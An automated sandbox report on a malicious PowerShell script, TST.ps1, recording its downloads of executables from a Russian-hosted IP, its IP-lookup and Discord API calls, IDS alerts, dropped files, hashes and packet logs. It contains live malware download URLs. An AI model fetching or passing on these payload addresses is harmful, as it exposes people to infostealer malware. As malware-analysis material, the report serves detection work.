                      SourceDetectionScannerLabelLink
                      http://nuget.org/NuGet.exe0%URL Reputationsafe
                      https://api.ip.sb/ip0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      https://go.micro0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://nuget.org/nuget.exe0%URL Reputationsafe
                      https://oneget.orgX0%URL Reputationsafe
                      https://aka.ms/pscore680%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      https://oneget.org0%URL Reputationsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      http://www.apache.org/licenses/LICENSE-2.00%Avira URL Cloudsafe
                      http://147.45.44.1310%Avira URL Cloudsafe
                      http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                      http://147.45.H0%Avira URL Cloudsafe
                      https://api.ip.s0%Avira URL Cloudsafe
                      https://github.com/Pester/Pester0%Avira URL Cloudsafe
                      https://g.live.com/odclientsettings/ProdV21C:0%Avira URL Cloudsafe
                      http://147.45.44XBk0%Avira URL Cloudsafe
                      http://147.45.44.131/files/mservice64.exe100%Avira URL Cloudmalware
                      https://g.live.com/odclientsettings/Prod1C:0%Avira URL Cloudsafe
                      http://147.45.44.131/files/TTF.exe100%Avira URL Cloudmalware
                      http://147.45.44.131/files0%Avira URL Cloudsafe
                      https://discord.com/api/v9/users/0%Avira URL Cloudsafe
                      http://147.45.440%Avira URL Cloudsafe
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      http://147.45.44.131/files/TTF.exefalse
                      • Avira URL Cloud: malware
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2229665328.000002C3E6D1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2206077558.000002C3D8717000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.2206077558.000002C3D8564000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ip.sb/ipRegAsm.exe, 00000003.00000002.2218088489.000000000317E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2206077558.000002C3D6ED8000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://147.45.Hpowershell.exe, 00000000.00000002.2206077558.000002C3D849E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2206077558.000002C3D6ED8000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://go.micropowershell.exe, 00000000.00000002.2206077558.000002C3D7B91000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contoso.com/Licensepowershell.exe, 00000000.00000002.2206077558.000002C3D8717000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contoso.com/Iconpowershell.exe, 00000000.00000002.2206077558.000002C3D8717000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000005.00000003.2211936578.0000021AB19E0000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.ver)svchost.exe, 00000005.00000002.3412377270.0000021AB1C00000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ip.sRegAsm.exe, 00000003.00000002.2218088489.000000000317E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2206077558.000002C3D6ED8000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://147.45.44XBkpowershell.exe, 00000000.00000002.2206077558.000002C3D7B91000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://147.45.44.131powershell.exe, 00000000.00000002.2206077558.000002C3D84B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2206077558.000002C3D7B91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2206077558.000002C3D6ED8000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://147.45.44.131/files/mservice64.exepowershell.exe, 00000000.00000002.2206077558.000002C3D84B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2206077558.000002C3D84A6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      https://g.live.com/odclientsettings/Prod1C:edb.log.5.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://147.45.44.131/filespowershell.exe, 00000000.00000002.2206077558.000002C3D7B91000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contoso.com/powershell.exe, 00000000.00000002.2206077558.000002C3D8717000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2229665328.000002C3E6D1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2206077558.000002C3D8717000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://discord.com/api/v9/users/RegAsm.exe, 00000003.00000002.2218088489.00000000032C1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://oneget.orgXpowershell.exe, 00000000.00000002.2206077558.000002C3D8564000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://aka.ms/pscore68powershell.exe, 00000000.00000002.2206077558.000002C3D6CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2206077558.000002C3D6CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://147.45.44powershell.exe, 00000000.00000002.2206077558.000002C3D7B91000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://oneget.orgpowershell.exe, 00000000.00000002.2206077558.000002C3D8564000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      147.45.44.131
                      unknownRussian Federation
                      2895FREE-NET-ASFREEnetEUfalse
                      IP
                      127.0.0.1
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1518260
                      Start date and time:2024-09-25 14:48:34 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 6m 7s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:9
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:TST.ps1
                      Detection:MAL
                      Classification:mal100.troj.expl.evad.winPS1@6/10@0/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 98%
                      • Number of executed functions: 55
                      • Number of non-executed functions: 12
                      Cookbook Comments:
                      • Found application associated with file extension: .ps1
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 184.28.90.27
                      • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: TST.ps1
                      TimeTypeDescription
                      08:49:31API Interceptor24x Sleep call for process: powershell.exe modified
                      08:49:34API Interceptor2x Sleep call for process: svchost.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      147.45.44.131Info.ps1Get hashmaliciousLummaCBrowse
                      • 147.45.44.131/files/cc.exe
                      Visual.ps1Get hashmaliciousUnknownBrowse
                      • 147.45.44.131/files/Installer.exe
                      Res.ps1Get hashmaliciousLummaCBrowse
                      • 147.45.44.131/files/CW.exe
                      tpq.ps1Get hashmaliciousUnknownBrowse
                      • 147.45.44.131/files/990.exe
                      Kv1tZKstAC.exeGet hashmaliciousUnknownBrowse
                      • 147.45.44.131/files/990.exe
                      SecuriteInfo.com.Win32.PWSX-gen.14983.3693.exeGet hashmaliciousLummaCBrowse
                      • 147.45.44.131/files/tpqg0.exe
                      KByiiYyiam.exeGet hashmaliciousLummaCBrowse
                      • 147.45.44.131/files/y75.exe
                      B0bHdMDGIN.exeGet hashmaliciousLummaCBrowse
                      • 147.45.44.131/files/u9.exe
                      AD3SI7tuzs.exeGet hashmaliciousLummaCBrowse
                      • 147.45.44.131/files/iy94.exe
                      SecuriteInfo.com.Win32.PWSX-gen.29050.19153.exeGet hashmaliciousLummaCBrowse
                      • 147.45.44.131/files/ypqhgl.exe
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      FREE-NET-ASFREEnetEUInfo.ps1Get hashmaliciousLummaCBrowse
                      • 147.45.44.131
                      Visual.ps1Get hashmaliciousUnknownBrowse
                      • 147.45.44.138
                      Res.ps1Get hashmaliciousLummaCBrowse
                      • 147.45.44.131
                      tpq.ps1Get hashmaliciousUnknownBrowse
                      • 147.45.44.131
                      Kv1tZKstAC.exeGet hashmaliciousUnknownBrowse
                      • 147.45.44.131
                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                      • 147.45.45.69
                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                      • 147.45.45.69
                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                      • 147.45.45.69
                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                      • 147.45.45.69
                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                      • 147.45.45.69
                      No context
                      No context
                      Process:C:\Windows\System32\svchost.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):1310720
                      Entropy (8bit):0.7263188066899657
                      Encrypted:false
                      SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0H:9JZj5MiKNnNhoxuK
                      MD5:0EDE8ACA7BD37C170649A96CC0C80B96
                      SHA1:3E18D853BAE3D4BD1ACB78D21F37D3BBD93F6FC5
                      SHA-256:FCDDE20E686A51226416FA455F40C9EAF33DDA6E40308D04E1AFDB916CB234D3
                      SHA-512:CD5D977BC0E2702CCB461B8BACB88BE4ECBF212A68E1CCEFB6619F5186C63687C8D20C5D718463F83D894BE0BB0442F8AD8E7D40DDF6E95CE7658F155EE3CECC
                      Malicious:false
                      Reputation:low
                      Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                      Process:C:\Windows\System32\svchost.exe
                      File Type:Extensible storage user DataBase, version 0x620, checksum 0xd694f33f, page size 16384, DirtyShutdown, Windows version 10.0
                      Category:dropped
                      Size (bytes):1310720
                      Entropy (8bit):0.7556178582708419
                      Encrypted:false
                      SSDEEP:1536:1SB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:1azaSvGJzYj2UlmOlOL
                      MD5:7663819C8E072CF33EC0CA7E9FAE3491
                      SHA1:4331B389A5E45ED216A2052F64F5EAF533BC9BAA
                      SHA-256:872A58A1B44CC39DEA42579F0C79D8E9AADE2D7FD8B34E1C40B868E8D7D0A28F
                      SHA-512:12191CC917DF535867E15970D374A3396CFA3B5A36AEEC70B54D9B809708BFB1E541BD4EAA9EF3E2C0A35DE07A12E4FAF40052AC3AE1F7A2F7ADF298812688E1
                      Malicious:false
                      Reputation:low
                      Preview:..?... .......7.......X\...;...{......................0.e......!...{?."1...|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{....................................,"1...|..................5.~."1...|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\System32\svchost.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):16384
                      Entropy (8bit):0.08025333566778572
                      Encrypted:false
                      SSDEEP:3:1i/KYewisGuNaAPaU1ltbExy/olluxmO+l/SNxOf:1yKzVxuNDPaURqyAgmOH
                      MD5:81C5272EEF56A76FA289A25FE03E0B1C
                      SHA1:123690D0BFD7F1788A4559CBAF5697072E0034FC
                      SHA-256:05723F9FBA1E2416E2554E448019C0E9533703B0A455183C226BF63D361DFBAC
                      SHA-512:656F425E887919F7B7C07E345C6FEA2FF6B8857D0456AE4B4A3387900D44D56BE22310537706E08ABAA259B6688A2684EAE5C7374943213992E2B74F8C75FC28
                      Malicious:false
                      Reputation:low
                      Preview:N/.......................................;...{.."1...|...!...{?..........!...{?..!...{?..g...!...{?.................5.~."1...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1119
                      Entropy (8bit):5.345080863654519
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
                      MD5:88593431AEF401417595E7A00FE86E5F
                      SHA1:1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
                      SHA-256:ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
                      SHA-512:1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):64
                      Entropy (8bit):1.1940658735648508
                      Encrypted:false
                      SSDEEP:3:NlllulnmWllZ:NllUmWl
                      MD5:3EBBEC2F920D055DAC842B4FF84448FA
                      SHA1:52D2AD86C481FAED6187FC7E6655C5BD646CA663
                      SHA-256:32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09
                      SHA-512:163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview:@...e................................................@..........
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):6224
                      Entropy (8bit):3.729658375665667
                      Encrypted:false
                      SSDEEP:48:2wDblqt/G3Cy2U2UqerukvhkvklCywu1Kp/lHJS7SogZoiVKp/ltS7SogZoG1:1OG3CoTekvhkvCCtiKp/JHpKp/BHl
                      MD5:4F81925993F88C63DCC7EF1C402172A8
                      SHA1:00DFDC143A8FF233041D8D82A1444BAD23214355
                      SHA-256:F1D75B07CEBE6847BBEA4EEC61AB150E0CCDCAAAD6132586AE78A4E3403D4D94
                      SHA-512:D7AB433240083EEE36F6EC530A90781FC788C8BC6857278CD3690CCD11FC693125FE70DD1AA1F1FAF6D0F704E7C50B5E8128BF7FE9DAD0131BA22504573B2D00
                      Malicious:false
                      Preview:...................................FL..................F.".. ...J.S...b..[I...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...N..WI......[I.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<29Y-f...........................^.A.p.p.D.a.t.a...B.V.1.....9Y+f..Roaming.@......EW<29Y+f..../.....................g...R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<29Y(f....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<29Y(f....2.....................r#..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<29Y(f....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<29Y(f....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<29Y/f....u...........
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):6224
                      Entropy (8bit):3.729658375665667
                      Encrypted:false
                      SSDEEP:48:2wDblqt/G3Cy2U2UqerukvhkvklCywu1Kp/lHJS7SogZoiVKp/ltS7SogZoG1:1OG3CoTekvhkvCCtiKp/JHpKp/BHl
                      MD5:4F81925993F88C63DCC7EF1C402172A8
                      SHA1:00DFDC143A8FF233041D8D82A1444BAD23214355
                      SHA-256:F1D75B07CEBE6847BBEA4EEC61AB150E0CCDCAAAD6132586AE78A4E3403D4D94
                      SHA-512:D7AB433240083EEE36F6EC530A90781FC788C8BC6857278CD3690CCD11FC693125FE70DD1AA1F1FAF6D0F704E7C50B5E8128BF7FE9DAD0131BA22504573B2D00
                      Malicious:false
                      Preview:...................................FL..................F.".. ...J.S...b..[I...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...N..WI......[I.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<29Y-f...........................^.A.p.p.D.a.t.a...B.V.1.....9Y+f..Roaming.@......EW<29Y+f..../.....................g...R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<29Y(f....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<29Y(f....2.....................r#..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<29Y(f....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<29Y(f....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<29Y/f....u...........
                      Process:C:\Windows\System32\svchost.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):55
                      Entropy (8bit):4.306461250274409
                      Encrypted:false
                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                      Malicious:false
                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                      File type:ASCII text, with very long lines (530), with CRLF line terminators
                      Entropy (8bit):6.08338960277344
                      TrID:
                        File name:TST.ps1
                        File size:4'920 bytes
                        MD5:34261ad4c802d025f6ead9dd56634860
                        SHA1:45e6e38e7b2f9b9d3529ede907cf40e4f5ab7c3e
                        SHA256:27bd8666cfbd715fe61a6b97294c7f4f6b15e61aefc65ebe91a77e4d5c8e74fa
                        SHA512:a5cf78da66614b253ebfb9ceae273f05084f76b29afaf91d9f07ecee2190454b5ae688652be978f8b68213ba436b85d66d71c88d94a4507ca131e0c90838f598
                        SSDEEP:96:aZmxGUY5oPhvPFUY/D4hvPwDyDXhvPSu9IR9IX:w2B7D4BIDyDXBKasO
                        TLSH:8AA10984A93BEEC445701247FB304582E111445ADDAEDE2A32498EA0B7F45DC3E6D3DD
                        File Content Preview:..$A5eUDXTXaEAjiEridexFqTO2mvdFGzhrIylKEl4eCdnJSHDVAFrzg8ChQL8HjNQbVIajTherJTDM5FJesQEBIiKawDtsNXuoVMnK = 'jZuPdP3wSxxsVqvXQ4Cur8sPstmOvoHdMO0BQ6rl7YQ='..$iv = 'MFdiLAlXoNndGefij/e4xg=='..$6TDT0ApX4qLLCuO2IP2dxAnQnlemZPpTSzH8NlbItnFFsiqTI1fHkJM66m5eWCyPAs
                        Icon Hash:3270d6baae77db44
                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-09-25T14:49:33.017016+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649711147.45.44.13180TCP
                        TimestampSource PortDest PortSource IPDest IP
                        Sep 25, 2024 14:49:31.900059938 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:31.927983046 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:31.928425074 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:31.928517103 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:31.953541040 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:32.616590977 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:32.616890907 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:32.616905928 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:32.616976023 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:32.618818998 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:32.618838072 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:32.618977070 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:32.618995905 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:32.619010925 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:32.619029045 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:32.619039059 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:32.619071007 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:32.620333910 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:32.620352030 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:32.620413065 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:32.621844053 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:32.622096062 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:32.622147083 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:32.622705936 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:32.666033030 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:32.769733906 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:32.820904970 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:32.826102018 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.016813993 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.016874075 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.016911030 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.017015934 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.017900944 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.017936945 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.017968893 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.019264936 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.019299984 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.019316912 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.021210909 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.021250010 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.021275997 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.022618055 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.022667885 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.022674084 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.022713900 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.022756100 CEST4971180192.168.2.6147.45.44.131
